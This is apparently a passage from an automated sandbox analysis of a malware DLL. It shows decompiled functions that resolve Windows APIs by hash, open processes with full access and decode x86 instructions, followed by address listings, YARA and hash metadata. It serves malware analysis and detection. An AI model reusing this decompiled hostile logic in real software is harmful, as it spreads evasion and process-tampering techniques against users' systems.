									_t202 = E6E9B3064(0x60a28c5c, 0x3659ae1e);
									__eflags = _t202;
									if(_t202 == 0) {
										L51:
										_t413 =  *(_t449 + 0x6c);
										__eflags = _t413;
										if(__eflags == 0) {
											break;
										}
										__eflags = _t413 - 0xffffffff;
										if(__eflags != 0) {
											E6E9AF828(_t449 + 0x40, E6E9AF4CC(_t449 + 0x3c) + 4);
											 *(E6E9AF4BC(_t449 + 0x40, E6E9AF4CC(_t449 + 0x3c) + 0xfffffffc)) =  *(_t449 + 0x6c);
											 *((intOrPtr*)(_t449 + 0x4c - 0x14)) =  *((intOrPtr*)(_t449 + 0x4c - 0x14)) + 1;
											E6E9ACD24(_t449 + 0x4c, __eflags);
											_t446 = _t446 + 1;
											__eflags = _t446 -  *(_t449 + 0x80);
											if(_t446 <  *(_t449 + 0x80)) {
												continue;
											}
											_t431 = 0;
											__eflags = 0;
											do {
												_t211 = E6E9AF4BC( *(_t449 + 4), _t431 * 4);
												_t212 = E6E9AF4BC(_t449 + 0x40, _t431 * 4);
												E6E9A8B58( *_t211, E6E9B02B0(0x60a28c5c, 0x840d15ae),  *_t212, 0, 0);
												_t431 = _t431 + 1;
												__eflags = _t431 -  *(_t449 + 0x80);
											} while (_t431 <  *(_t449 + 0x80));
											goto L57;
										}
										break;
									}
									_t413 = 0;
									_push(2);
									_push(0);
									_push(0);
									_push(_t449 + 0x6c);
									_push( *((intOrPtr*)(_t449 + 0x78)));
									_push( *((intOrPtr*)(_t449 + 0x60)));
									_push(0xffffffff);
									asm("int3");
									asm("int3");
									__eflags = _t202;
									if(__eflags != 0) {
										break;
									}
									goto L51;
								}
								E6E9ACD24(_t449 + 0x4c, __eflags);
								goto L59;
							}
							_t427 =  *_t173;
							__eflags = _t427;
							if(_t427 <= 0) {
								goto L46;
							}
							_t430 = 0;
							__eflags = 0;
							_t322 =  &(_t173[1]);
							while(1) {
								_t433 = _t430 * 4;
								_t217 = E6E9AF4BC(_t322, _t433);
								_t218 =  *(_t449 + 4);
								__eflags =  *_t217 - _t218[0xc];
								if( *_t217 == _t218[0xc]) {
									break;
								}
								_t430 = _t430 + 1;
								__eflags = _t430 - _t427;
								if(_t430 < _t427) {
									continue;
								}
								goto L46;
							}
							__eflags = _t430 - 0xffffffff;
							if(_t430 != 0xffffffff) {
								_t219 = E6E9AF4CC( *_t449);
								__eflags = _t219 - _t433;
								if(_t219 > _t433) {
									 *((intOrPtr*)(_t449 + 0x74)) = 4 + _t430 * 4;
									_t247 = E6E9AF4CC( *_t449);
									__eflags = _t247 -  *((intOrPtr*)(_t449 + 0x74));
									if(_t247 >  *((intOrPtr*)(_t449 + 0x74))) {
										 *((intOrPtr*)(_t449 + 0x90)) = E6E9AF4BC( *(_t449 + 4), _t433);
										 *((intOrPtr*)(_t449 + 0x8c)) = E6E9AF4BC( *(_t449 + 4),  *((intOrPtr*)(_t449 + 0x74)));
										E6E9B38F0( *((intOrPtr*)(_t449 + 0x98)),  *((intOrPtr*)(_t449 + 0x90)), E6E9AF4CC( *_t449) -  *((intOrPtr*)(_t449 + 0x74)));
										_t449 = _t449 + 0xc;
									}
									E6E9AF828( *(_t449 + 4), E6E9AF4CC( *_t449) + 0xfffffffc);
									_t421 =  *(_t449 + 4);
									_t75 =  &(_t421[6]);
									 *_t75 = _t421[6] - 1;
									__eflags =  *_t75;
								}
								_t220 = E6E9AF4CC(_t322);
								__eflags = _t220 - _t433;
								if(_t220 > _t433) {
									_t430 = 4 + _t430 * 4;
									_t237 = E6E9AF4CC(_t322);
									__eflags = _t237 - _t430;
									if(_t237 > _t430) {
										_t238 = E6E9AF4BC(_t322, _t433);
										 *((intOrPtr*)(_t449 + 0x94)) = E6E9AF4BC(_t322, _t430);
										E6E9B38F0(_t238,  *((intOrPtr*)(_t449 + 0x98)), E6E9AF4CC(_t322) - _t430);
										_t449 = _t449 + 0xc;
									}
									E6E9AF828(_t322, E6E9AF4CC(_t322) + 0xfffffffc);
									_t246 =  *(_t449 + 4);
									 *_t246 =  *_t246 - 1;
									__eflags =  *_t246;
								}
								E6E9AF828( *(_t449 + 4), E6E9AF4CC( *_t449) + 4);
								 *(E6E9AF4BC( *(_t449 + 4), E6E9AF4CC( *_t449) + 0xfffffffc)) = ( *(_t449 + 4))[0xb];
								( *(_t449 + 4))[6] = ( *(_t449 + 4))[6] + 1;
								E6E9AF828(_t322, E6E9AF4CC(_t322) + 4);
								 *(E6E9AF4BC(_t322, E6E9AF4CC(_t322) + 0xfffffffc)) = ( *(_t449 + 4))[0xc];
								 *( *(_t449 + 4)) =  *( *(_t449 + 4)) + 1;
							}
							goto L46;
						}
						_t323 = 0;
						__eflags = 0;
						do {
							 *(_t449 + 0x7c) = _t323 * 4;
							_t428 = E6E9AF4BC(_t449 + 0x28, _t323 * 4);
							_t258 =  *(_t449 + 4);
							_t430 =  *_t258;
							__eflags = _t430;
							if(_t430 <= 0) {
								L29:
								_t437 = E6E9B3064(0x8e844d1e, 0x5c3654e3);
								__eflags = _t437;
								if(_t437 != 0) {
									_t439 =  *_t437(0x1fffff, 0,  *((intOrPtr*)(E6E9AF4BC(_t449 + 0x28,  *(_t449 + 0x7c)))));
									__eflags = _t439;
									if(_t439 != 0) {
										E6E9AF828( *(_t449 + 4), E6E9AF4CC( *_t449) + 4);
										 *(E6E9AF4BC( *(_t449 + 4), E6E9AF4CC( *_t449) + 0xfffffffc)) = _t439;
										 *((intOrPtr*)( *((intOrPtr*)(_t449 + 0x28 - 0x20)) + 0x18)) =  *((intOrPtr*)( *((intOrPtr*)(_t449 + 0x28 - 0x20)) + 0x18)) + 1;
										_t269 = E6E9AF4BC(_t449 + 0x28,  *(_t449 + 0x7c));
										 *(_t449 + 0x70) =  &(( *(_t449 + 4))[1]);
										E6E9AF828( *((intOrPtr*)(_t449 + 0x74)), E6E9AF4CC( &(( *(_t449 + 4))[1])) + 4);
										 *((intOrPtr*)(E6E9AF4BC( *((intOrPtr*)(_t449 + 0x74)), E6E9AF4CC( *(_t449 + 0x70)) + 0xfffffffc))) =  *_t269;
										_t277 =  *(_t449 + 4);
										 *_t277 =  *_t277 + 1;
										__eflags =  *_t277;
									}
								}
								goto L32;
							}
							_t438 = 0;
							__eflags = 0;
							 *(_t449 + 0x88) =  &(_t258[1]);
							while(1) {
								_t279 = E6E9AF4BC( *((intOrPtr*)(_t449 + 0x8c)), _t438 * 4);
								__eflags =  *_t279 -  *_t428;
								if( *_t279 ==  *_t428) {
									break;
								}
								_t438 = _t438 + 1;
								__eflags = _t438 - _t430;
								if(_t438 < _t430) {
									continue;
								}
								goto L29;
							}
							__eflags = _t438 - 0xffffffff;
							if(_t438 == 0xffffffff) {
								goto L29;
							}
							L32:
							_t323 = _t323 + 1;
							__eflags = _t323 -  *(_t449 + 0x20);
						} while (_t323 <  *(_t449 + 0x20));
						goto L33;
					} else {
						_t324 = 0;
						__eflags = 0;
						do {
							 *(_t449 + 0x64) = _t324 * 4;
							_t429 = E6E9AF4BC( *(_t449 + 0x7c), _t324 * 4);
							_t430 =  *(_t449 + 0x20);
							__eflags = _t430;
							if(_t430 <= 0) {
								L11:
								_t430 =  &(( *(_t449 + 4))[1]);
								_t283 = E6E9AF4CC( &(( *(_t449 + 4))[1]));
								__eflags = _t283 -  *(_t449 + 0x64);
								if(_t283 >  *(_t449 + 0x64)) {
									_t443 = 4 + _t324 * 4;
									_t299 = E6E9AF4CC(_t430);
									__eflags = _t299 - _t443;
									if(_t299 > _t443) {
										 *((intOrPtr*)(_t449 + 0x9c)) = E6E9AF4BC(_t430,  *(_t449 + 0x64));
										 *((intOrPtr*)(_t449 + 0x98)) = E6E9AF4BC(_t430, _t443);
										E6E9B38F0( *((intOrPtr*)(_t449 + 0xa4)),  *((intOrPtr*)(_t449 + 0x9c)), E6E9AF4CC(_t430) - _t443);
										_t449 = _t449 + 0xc;
									}
									E6E9AF828(_t430, E6E9AF4CC(_t430) + 0xfffffffc);
									_t308 =  *(_t449 + 4);
									 *_t308 =  *_t308 - 1;
									__eflags =  *_t308;
								}
								_t442 = E6E9B3064(0x60a28c5c, 0xe96b154c);
								__eflags = _t442;
								if(_t442 != 0) {
									 *_t442( *(E6E9AF4BC( *(_t449 + 4),  *(_t449 + 0x64))));
								}
								_t285 = E6E9AF4CC( *_t449);
								__eflags = _t285 -  *(_t449 + 0x64);
								if(_t285 >  *(_t449 + 0x64)) {
									_t445 = 4 + _t324 * 4;
									_t287 = E6E9AF4CC( *_t449);
									__eflags = _t287 - _t445;
									if(_t287 > _t445) {
										_t430 = E6E9AF4BC( *(_t449 + 4),  *(_t449 + 0x64));
										 *((intOrPtr*)(_t449 + 0xa0)) = E6E9AF4BC( *(_t449 + 4), _t445);
										E6E9B38F0(_t288,  *((intOrPtr*)(_t449 + 0xa4)), E6E9AF4CC( *_t449) - _t445);
										_t449 = _t449 + 0xc;
									}
									E6E9AF828( *(_t449 + 4), E6E9AF4CC( *_t449) + 0xfffffffc);
									_t296 =  *(_t449 + 4);
									_t33 =  &(_t296[6]);
									 *_t33 = _t296[6] - 1;
									__eflags =  *_t33;
								}
								_t324 = _t324 - 1;
								__eflags = _t324;
								goto L20;
							}
							_t444 = 0;
							__eflags = 0;
							while(1) {
								_t310 = E6E9AF4BC(_t449 + 0x28, _t444 * 4);
								__eflags =  *_t310 -  *_t429;
								if( *_t310 ==  *_t429) {
									break;
								}
								_t444 = _t444 + 1;
								__eflags = _t444 - _t430;
								if(_t444 < _t430) {
									continue;
								}
								goto L11;
							}
							__eflags = _t444 - 0xffffffff;
							if(_t444 == 0xffffffff) {
								goto L11;
							}
							L20:
							_t324 = _t324 + 1;
							__eflags = _t324 -  *( *(_t449 + 4));
						} while (_t324 <  *( *(_t449 + 4)));
						goto L21;
					}
				}
			}























































                                                                                                                                                  0x6e9a8435
                                                                                                                                                  0x6e9a843b
                                                                                                                                                  0x6e9a843f
                                                                                                                                                  0x6e9a8443
                                                                                                                                                  0x6e9a844e
                                                                                                                                                  0x6e9a8452
                                                                                                                                                  0x6e9a8457
                                                                                                                                                  0x6e9a845f
                                                                                                                                                  0x6e9a846f
                                                                                                                                                  0x00000000
                                                                                                                                                  0x6e9a8471
                                                                                                                                                  0x6e9a8479
                                                                                                                                                  0x6e9a8480
                                                                                                                                                  0x6e9a8480
                                                                                                                                                  0x6e9a89d3
                                                                                                                                                  0x6e9a89d5
                                                                                                                                                  0x6e9a8a16
                                                                                                                                                  0x6e9a8a18
                                                                                                                                                  0x6e9a8a27
                                                                                                                                                  0x6e9a8a33
                                                                                                                                                  0x6e9a8a33
                                                                                                                                                  0x6e9a8a22
                                                                                                                                                  0x6e9a8a39
                                                                                                                                                  0x6e9a8a3e
                                                                                                                                                  0x00000000
                                                                                                                                                  0x6e9a8a3e
                                                                                                                                                  0x6e9a8a26
                                                                                                                                                  0x00000000
                                                                                                                                                  0x6e9a848a
                                                                                                                                                  0x6e9a848e
                                                                                                                                                  0x6e9a8491
                                                                                                                                                  0x6e9a8599
                                                                                                                                                  0x6e9a8599
                                                                                                                                                  0x6e9a859e
                                                                                                                                                  0x6e9a86c1
                                                                                                                                                  0x6e9a86c5
                                                                                                                                                  0x6e9a86ca
                                                                                                                                                  0x6e9a86ce
                                                                                                                                                  0x6e9a86d2
                                                                                                                                                  0x6e9a8808
                                                                                                                                                  0x6e9a880a
                                                                                                                                                  0x6e9a880e
                                                                                                                                                  0x6e9a8817
                                                                                                                                                  0x6e9a8822
                                                                                                                                                  0x6e9a8826
                                                                                                                                                  0x6e9a882f
                                                                                                                                                  0x6e9a8834
                                                                                                                                                  0x6e9a883a
                                                                                                                                                  0x6e9a883b
                                                                                                                                                  0x6e9a883f
                                                                                                                                                  0x6e9a8843
                                                                                                                                                  0x6e9a884a
                                                                                                                                                  0x6e9a884c
                                                                                                                                                  0x6e9a898c
                                                                                                                                                  0x6e9a899d
                                                                                                                                                  0x6e9a89a4
                                                                                                                                                  0x6e9a89ab
                                                                                                                                                  0x6e9a89ab
                                                                                                                                                  0x6e9a89ae
                                                                                                                                                  0x6e9a89b1
                                                                                                                                                  0x6e9a89b4
                                                                                                                                                  0x6e9a89ba
                                                                                                                                                  0x6e9a89c1
                                                                                                                                                  0x6e9a89c5
                                                                                                                                                  0x6e9a89ce
                                                                                                                                                  0x00000000
                                                                                                                                                  0x6e9a89ce
                                                                                                                                                  0x6e9a89bc
                                                                                                                                                  0x6e9a89bf
                                                                                                                                                  0x6e9a89d8
                                                                                                                                                  0x6e9a89f0
                                                                                                                                                  0x6e9a89f3
                                                                                                                                                  0x6e9a89f8
                                                                                                                                                  0x6e9a8a02
                                                                                                                                                  0x6e9a8a05
                                                                                                                                                  0x6e9a8a08
                                                                                                                                                  0x6e9a8a11
                                                                                                                                                  0x00000000
                                                                                                                                                  0x6e9a8a11
                                                                                                                                                  0x00000000
                                                                                                                                                  0x6e9a89bf
                                                                                                                                                  0x6e9a8854
                                                                                                                                                  0x6e9a8854
                                                                                                                                                  0x6e9a8856
                                                                                                                                                  0x6e9a885a
                                                                                                                                                  0x6e9a885f
                                                                                                                                                  0x6e9a8861
                                                                                                                                                  0x6e9a8865
                                                                                                                                                  0x6e9a8868
                                                                                                                                                  0x6e9a8870
                                                                                                                                                  0x6e9a8872
                                                                                                                                                  0x00000000
                                                                                                                                                  0x00000000
                                                                                                                                                  0x6e9a8889
                                                                                                                                                  0x6e9a88a4
                                                                                                                                                  0x6e9a88a6
                                                                                                                                                  0x6e9a88b4
                                                                                                                                                  0x6e9a88b9
                                                                                                                                                  0x6e9a88bb
                                                                                                                                                  0x6e9a88d8
                                                                                                                                                  0x6e9a88d8
                                                                                                                                                  0x6e9a88dc
                                                                                                                                                  0x6e9a88de
                                                                                                                                                  0x00000000
                                                                                                                                                  0x00000000
                                                                                                                                                  0x6e9a88e0
                                                                                                                                                  0x6e9a88e3
                                                                                                                                                  0x6e9a8904
                                                                                                                                                  0x6e9a8923
                                                                                                                                                  0x6e9a8929
                                                                                                                                                  0x6e9a892c
                                                                                                                                                  0x6e9a8931
                                                                                                                                                  0x6e9a8932
                                                                                                                                                  0x6e9a8939
                                                                                                                                                  0x00000000
                                                                                                                                                  0x00000000
                                                                                                                                                  0x6e9a8941
                                                                                                                                                  0x6e9a8941
                                                                                                                                                  0x6e9a8943
                                                                                                                                                  0x6e9a894f
                                                                                                                                                  0x6e9a895b
                                                                                                                                                  0x6e9a897d
                                                                                                                                                  0x6e9a8982
                                                                                                                                                  0x6e9a8983
                                                                                                                                                  0x6e9a8983
                                                                                                                                                  0x00000000
                                                                                                                                                  0x6e9a8943
                                                                                                                                                  0x00000000
                                                                                                                                                  0x6e9a88e3
                                                                                                                                                  0x6e9a88bd
                                                                                                                                                  0x6e9a88c3
                                                                                                                                                  0x6e9a88c5
                                                                                                                                                  0x6e9a88c6
                                                                                                                                                  0x6e9a88c7
                                                                                                                                                  0x6e9a88c8
                                                                                                                                                  0x6e9a88cc
                                                                                                                                                  0x6e9a88d0
                                                                                                                                                  0x6e9a88d2
                                                                                                                                                  0x6e9a88d3
                                                                                                                                                  0x6e9a88d4
                                                                                                                                                  0x6e9a88d6
                                                                                                                                                  0x00000000
                                                                                                                                                  0x00000000
                                                                                                                                                  0x00000000
                                                                                                                                                  0x6e9a88d6
                                                                                                                                                  0x6e9a88e9
                                                                                                                                                  0x00000000
                                                                                                                                                  0x6e9a88e9
                                                                                                                                                  0x6e9a86d8
                                                                                                                                                  0x6e9a86da
                                                                                                                                                  0x6e9a86dc
                                                                                                                                                  0x00000000
                                                                                                                                                  0x00000000
                                                                                                                                                  0x6e9a86e6
                                                                                                                                                  0x6e9a86e6
                                                                                                                                                  0x6e9a86e8
                                                                                                                                                  0x6e9a86eb
                                                                                                                                                  0x6e9a86ed
                                                                                                                                                  0x6e9a86f5
                                                                                                                                                  0x6e9a86fc
                                                                                                                                                  0x6e9a8700
                                                                                                                                                  0x6e9a8703
                                                                                                                                                  0x00000000
                                                                                                                                                  0x00000000
                                                                                                                                                  0x6e9a87ff
                                                                                                                                                  0x6e9a8800
                                                                                                                                                  0x6e9a8802
                                                                                                                                                  0x00000000
                                                                                                                                                  0x00000000
                                                                                                                                                  0x00000000
                                                                                                                                                  0x6e9a8802
                                                                                                                                                  0x6e9a8709
                                                                                                                                                  0x6e9a870c
                                                                                                                                                  0x6e9a8715
                                                                                                                                                  0x6e9a871a
                                                                                                                                                  0x6e9a871c
                                                                                                                                                  0x6e9a8728
                                                                                                                                                  0x6e9a872c
                                                                                                                                                  0x6e9a8731
                                                                                                                                                  0x6e9a8735
                                                                                                                                                  0x6e9a8b12
                                                                                                                                                  0x6e9a8b26
                                                                                                                                                  0x6e9a8b48
                                                                                                                                                  0x6e9a8b4d
                                                                                                                                                  0x6e9a8b4d
                                                                                                                                                  0x6e9a874b
                                                                                                                                                  0x6e9a8750
                                                                                                                                                  0x6e9a8754
                                                                                                                                                  0x6e9a8754
                                                                                                                                                  0x6e9a8754
                                                                                                                                                  0x6e9a8754
                                                                                                                                                  0x6e9a8759
                                                                                                                                                  0x6e9a875e
                                                                                                                                                  0x6e9a8760
                                                                                                                                                  0x6e9a8764
                                                                                                                                                  0x6e9a876b
                                                                                                                                                  0x6e9a8770
                                                                                                                                                  0x6e9a8772
                                                                                                                                                  0x6e9a8ad3
                                                                                                                                                  0x6e9a8ae2
                                                                                                                                                  0x6e9a8afb
                                                                                                                                                  0x6e9a8b00
                                                                                                                                                  0x6e9a8b00
                                                                                                                                                  0x6e9a8785
                                                                                                                                                  0x6e9a878a
                                                                                                                                                  0x6e9a878e
                                                                                                                                                  0x6e9a878e
                                                                                                                                                  0x6e9a878e
                                                                                                                                                  0x6e9a87a0
                                                                                                                                                  0x6e9a87c1
                                                                                                                                                  0x6e9a87c9
                                                                                                                                                  0x6e9a87d7
                                                                                                                                                  0x6e9a87f5
                                                                                                                                                  0x6e9a87fb
                                                                                                                                                  0x6e9a87fb
                                                                                                                                                  0x00000000
                                                                                                                                                  0x6e9a870c
                                                                                                                                                  0x6e9a85a4
                                                                                                                                                  0x6e9a85a4
                                                                                                                                                  0x6e9a85a6
                                                                                                                                                  0x6e9a85ad
                                                                                                                                                  0x6e9a85bb
                                                                                                                                                  0x6e9a85bd
                                                                                                                                                  0x6e9a85c1
                                                                                                                                                  0x6e9a85c3
                                                                                                                                                  0x6e9a85c5
                                                                                                                                                  0x6e9a8600
                                                                                                                                                  0x6e9a860f
                                                                                                                                                  0x6e9a8611
                                                                                                                                                  0x6e9a8613
                                                                                                                                                  0x6e9a8631
                                                                                                                                                  0x6e9a8633
                                                                                                                                                  0x6e9a8635
                                                                                                                                                  0x6e9a8647
                                                                                                                                                  0x6e9a8665
                                                                                                                                                  0x6e9a866e
                                                                                                                                                  0x6e9a8671
                                                                                                                                                  0x6e9a867f
                                                                                                                                                  0x6e9a8690
                                                                                                                                                  0x6e9a86ae
                                                                                                                                                  0x6e9a86b0
                                                                                                                                                  0x6e9a86b4
                                                                                                                                                  0x6e9a86b4
                                                                                                                                                  0x6e9a86b4
                                                                                                                                                  0x6e9a8635
                                                                                                                                                  0x00000000
                                                                                                                                                  0x6e9a8613
                                                                                                                                                  0x6e9a85cb
                                                                                                                                                  0x6e9a85cb
                                                                                                                                                  0x6e9a85d0
                                                                                                                                                  0x6e9a85d7
                                                                                                                                                  0x6e9a85e6
                                                                                                                                                  0x6e9a85ed
                                                                                                                                                  0x6e9a85ef
                                                                                                                                                  0x00000000
                                                                                                                                                  0x00000000
                                                                                                                                                  0x6e9a85fb
                                                                                                                                                  0x6e9a85fc
                                                                                                                                                  0x6e9a85fe
                                                                                                                                                  0x00000000
                                                                                                                                                  0x00000000
                                                                                                                                                  0x00000000
                                                                                                                                                  0x6e9a85fe
                                                                                                                                                  0x6e9a85f1
                                                                                                                                                  0x6e9a85f4
                                                                                                                                                  0x00000000
                                                                                                                                                  0x00000000
                                                                                                                                                  0x6e9a86b6
                                                                                                                                                  0x6e9a86b6
                                                                                                                                                  0x6e9a86b7
                                                                                                                                                  0x6e9a86b7
                                                                                                                                                  0x00000000
                                                                                                                                                  0x6e9a8497
                                                                                                                                                  0x6e9a8497
                                                                                                                                                  0x6e9a8497
                                                                                                                                                  0x6e9a8499
                                                                                                                                                  0x6e9a84a0
                                                                                                                                                  0x6e9a84ae
                                                                                                                                                  0x6e9a84b0
                                                                                                                                                  0x6e9a84b4
                                                                                                                                                  0x6e9a84b6
                                                                                                                                                  0x6e9a84e2
                                                                                                                                                  0x6e9a84e6
                                                                                                                                                  0x6e9a84eb
                                                                                                                                                  0x6e9a84f0
                                                                                                                                                  0x6e9a84f4
                                                                                                                                                  0x6e9a84f8
                                                                                                                                                  0x6e9a84ff
                                                                                                                                                  0x6e9a8504
                                                                                                                                                  0x6e9a8506
                                                                                                                                                  0x6e9a8a95
                                                                                                                                                  0x6e9a8aa4
                                                                                                                                                  0x6e9a8ac3
                                                                                                                                                  0x6e9a8ac8
                                                                                                                                                  0x6e9a8ac8
                                                                                                                                                  0x6e9a8519
                                                                                                                                                  0x6e9a851e
                                                                                                                                                  0x6e9a8522
                                                                                                                                                  0x6e9a8522
                                                                                                                                                  0x6e9a8522
                                                                                                                                                  0x6e9a8533
                                                                                                                                                  0x6e9a8535
                                                                                                                                                  0x6e9a8537
                                                                                                                                                  0x6e9a8548
                                                                                                                                                  0x6e9a8548
                                                                                                                                                  0x6e9a854d
                                                                                                                                                  0x6e9a8552
                                                                                                                                                  0x6e9a8556
                                                                                                                                                  0x6e9a855b
                                                                                                                                                  0x6e9a8562
                                                                                                                                                  0x6e9a8567
                                                                                                                                                  0x6e9a8569
                                                                                                                                                  0x6e9a8a57
                                                                                                                                                  0x6e9a8a63
                                                                                                                                                  0x6e9a8a7d
                                                                                                                                                  0x6e9a8a82
                                                                                                                                                  0x6e9a8a82
                                                                                                                                                  0x6e9a857f
                                                                                                                                                  0x6e9a8584
                                                                                                                                                  0x6e9a8588
                                                                                                                                                  0x6e9a8588
                                                                                                                                                  0x6e9a8588
                                                                                                                                                  0x6e9a8588
                                                                                                                                                  0x6e9a858b
                                                                                                                                                  0x6e9a858b
                                                                                                                                                  0x00000000
                                                                                                                                                  0x6e9a858b
                                                                                                                                                  0x6e9a84ba
                                                                                                                                                  0x6e9a84ba
                                                                                                                                                  0x6e9a84bc
                                                                                                                                                  0x6e9a84c8
                                                                                                                                                  0x6e9a84cf
                                                                                                                                                  0x6e9a84d1
                                                                                                                                                  0x00000000
                                                                                                                                                  0x00000000
                                                                                                                                                  0x6e9a84dd
                                                                                                                                                  0x6e9a84de
                                                                                                                                                  0x6e9a84e0
                                                                                                                                                  0x00000000
                                                                                                                                                  0x00000000
                                                                                                                                                  0x00000000
                                                                                                                                                  0x6e9a84e0
                                                                                                                                                  0x6e9a84d3
                                                                                                                                                  0x6e9a84d6
                                                                                                                                                  0x00000000
                                                                                                                                                  0x00000000
                                                                                                                                                  0x6e9a858c
                                                                                                                                                  0x6e9a8590
                                                                                                                                                  0x6e9a8591
                                                                                                                                                  0x6e9a8591
                                                                                                                                                  0x00000000
                                                                                                                                                  0x6e9a8499
                                                                                                                                                  0x6e9a8491

                                                                                                                                                  Strings
                                                                                                                                                  Memory Dump Source
                                                                                                                                                  • Source File: 00000001.00000002.685190249.000000006E9A1000.00000020.00020000.sdmp, Offset: 6E9A0000, based on PE: true
                                                                                                                                                  • Associated: 00000001.00000002.685164563.000000006E9A0000.00000002.00020000.sdmp Download File
                                                                                                                                                  • Associated: 00000001.00000002.685274294.000000006E9BA000.00000002.00020000.sdmp Download File
                                                                                                                                                  • Associated: 00000001.00000002.685296966.000000006E9BD000.00000004.00020000.sdmp Download File
                                                                                                                                                  • Associated: 00000001.00000002.685311272.000000006E9BF000.00000002.00020000.sdmp Download File
                                                                                                                                                  Yara matches
                                                                                                                                                  Similarity
                                                                                                                                                  • API ID:
                                                                                                                                                  • String ID:
                                                                                                                                                  • API String ID: 0-3916222277
                                                                                                                                                  • Opcode ID: 279083827db811fd0b89b997a3ea316dd13a70475ee85e0ee703b4e748732df2
                                                                                                                                                  • Instruction ID: dffc03f49a50d40e9ef5d7d8e45edb5f2351a12901cb61dceb03f6bffeb9055a
                                                                                                                                                  • Opcode Fuzzy Hash: 279083827db811fd0b89b997a3ea316dd13a70475ee85e0ee703b4e748732df2
                                                                                                                                                  • Instruction Fuzzy Hash: 53123D716082459FC764DFA8C898AAEB7E9EFD5708F104D2DE699872A1DB30DC05CF42
                                                                                                                                                  Uniqueness

                                                                                                                                                  Uniqueness Score: -1.00%

                                                                                                                                                  Function 6E9B9370, Relevance: 1.8, Strings: 1, Instructions: 529COMMONCrypto
                                                                                                                                                  Download Yara Rule
                                                                                                                                                  C-Code - Quality: 99%
                                                                                                                                                  			E6E9B9370(intOrPtr __ecx, intOrPtr __edx, void* __eflags) {
				signed int _t250;
				signed char _t251;
				signed char* _t254;
				char _t255;
				signed short _t256;
				char _t257;
				signed short _t260;
				signed int _t261;
				signed int _t262;
				void* _t264;
				void* _t272;
				void* _t273;
				signed short* _t274;
				signed char _t275;
				signed int _t277;
				signed int _t278;
				void* _t282;
				signed int _t288;
				unsigned int _t290;
				signed int _t292;
				signed int _t293;
				signed int _t294;
				signed int _t295;
				unsigned int _t296;
				unsigned int _t297;
				signed int _t299;
				unsigned int _t301;
				signed char _t302;
				signed int _t304;
				signed char _t307;
				signed char _t308;
				signed int _t309;
				void* _t312;
				void* _t313;
				signed int _t314;
				signed int _t316;
				signed int _t319;
				signed int _t321;
				signed int _t338;
				signed int _t339;
				signed int _t343;
				signed int _t345;
				unsigned int* _t346;
				unsigned int _t354;
				signed int _t355;
				void* _t357;
				signed int _t364;
				signed int _t366;
				signed int _t383;
				signed int _t388;
				signed int _t391;
				signed int _t395;
				signed int _t396;
				signed int _t397;
				signed int _t398;
				signed int _t399;
				signed int _t400;
				signed int _t403;
				signed int _t408;
				signed int _t411;
				signed int _t412;
				signed int _t413;
				signed int _t417;
				signed int _t419;
				signed int _t424;
				void* _t426;
				signed int* _t427;

				 *((intOrPtr*)(_t426 + 0x24)) = __edx;
				 *((intOrPtr*)(_t426 + 0x10)) = __ecx;
				 *((intOrPtr*)(_t426 + 0x14)) = __ecx;
				_t274 =  *(_t426 + 0x48);
				E6E9B3698( *(_t426 + 0x48), 0, 0x1c);
				_t427 = _t426 + 0xc;
				_t338 = 0;
				_t282 = 0x10;
				do {
					_t250 =  *_t274 & 0x000000ff;
					_t274 =  &(_t274[0]);
					if(_t250 == 0xf3) {
						_t383 = _t427[0x10];
						_t339 = _t338 | 0x00000004;
						L18:
						_t338 = _t339 & 0x000000ff;
						 *(_t383 + 1) = _t250;
						goto L19;
					}
					if(_t250 == 0xf2) {
						_t383 = _t427[0x10];
						_t339 = _t338 | 0x00000002;
						goto L18;
					}
					if(_t250 == 0xf0) {
						_t338 = (_t338 | 0x00000020) & 0x000000ff;
						 *(_t427[0x10] + 2) = _t250;
						goto L19;
					}
					if(_t250 == 0x26 || _t250 == 0x2e || _t250 == 0x36 || _t250 == 0x3e) {
						L14:
						_t338 = (_t338 | 0x00000040) & 0x000000ff;
						 *(_t427[0x10] + 3) = _t250;
					} else {
						_t6 = _t250 - 0x64; // -100
						if(_t6 <= 1) {
							goto L14;
						}
						if (_t250 == 0x66) goto L13;
						asm("adc [ebx+0x587567f8], eax");
					}
					L19:
					_t282 = _t282 + 0xff;
				} while (_t282 != 0);
				_t388 = _t427[0x10];
				_t285 =  !=  ? _t338 : 1;
				_t343 = _t338 << 0x17;
				 *(_t388 + 6) = _t250;
				 *_t427 =  !=  ? _t338 : 1;
				 *(_t388 + 0x18) = _t343;
				if(_t250 == 0xf) {
					_t250 =  *_t274 & 0x000000ff;
					_t274 =  &(_t274[0]);
					_t427[5] = _t250;
					 *(_t427[0x10] + 7) = _t250;
					_t427[2] = _t427[4] + 0x4a;
				} else {
					_t22 = _t250 - 0xa0; // -160
					_t427[5] =  *(_t427[0x10] + 7) & 0x000000ff;
					if(_t22 <= 3) {
						_t424 =  *_t427;
						_t382 =  !=  ? (_t424 | 0x00000008) & 0x000000ff : _t424 & 0x000000f7;
						 *_t427 =  !=  ? (_t424 | 0x00000008) & 0x000000ff : _t424 & 0x000000f7;
					}
				}
				_t354 = _t250 >> 2;
				_t391 = _t250 & 0x00000003;
				_t345 = _t427[2];
				_t427[3] = _t391;
				_t427[6] = _t354;
				_t288 =  *(( *(_t354 + _t345) & 0x000000ff) + _t391 + _t345) & 0x000000ff;
				_t427[1] = _t288;
				if(_t288 == 0xff) {
					_t343 = _t343 + 0x3000;
					_t288 = 0 | (_t250 & 0xfffffffd) == 0x00000024;
					 *(_t427[0x10] + 0x18) = _t343;
					_t427[1] = _t288;
				}
				if((_t427[1] & 0x00000080) != 0) {
					_t290 =  *((_t288 & 0x0000007f) + _t345) & 0x0000ffff;
					_t427[1] = _t290;
					_t395 = _t290 >> 8;
				} else {
					_t395 = 0;
				}
				if(_t427[5] != 0 && ( *_t427 &  *(( *(_t427[6] + _t427[4] + 0x130) & 0x000000ff) + _t427[3] + _t427[4] + 0x130) & 0x000000ff) != 0) {
					_t343 = _t343 | 0x00003000;
					 *(_t427[0x10] + 0x18) = _t343;
				}
				if((_t427[1] & 0x00000001) == 0) {
					if(( *_t427 & 0x00000020) != 0) {
						_t343 = _t343 | 0x00009000;
						 *(_t427[0x10] + 0x18) = _t343;
					}
					goto L115;
				} else {
					_t355 = _t427[0x10];
					_t343 = _t343 | 0x00000001;
					 *(_t355 + 0x18) = _t343;
					_t296 =  *_t274 & 0x000000ff;
					_t346 =  &(_t427[6]);
					 *_t346 = _t296;
					 *(_t355 + 8) = _t296;
					_t297 = _t296 >> 6;
					_t427[3] = _t297;
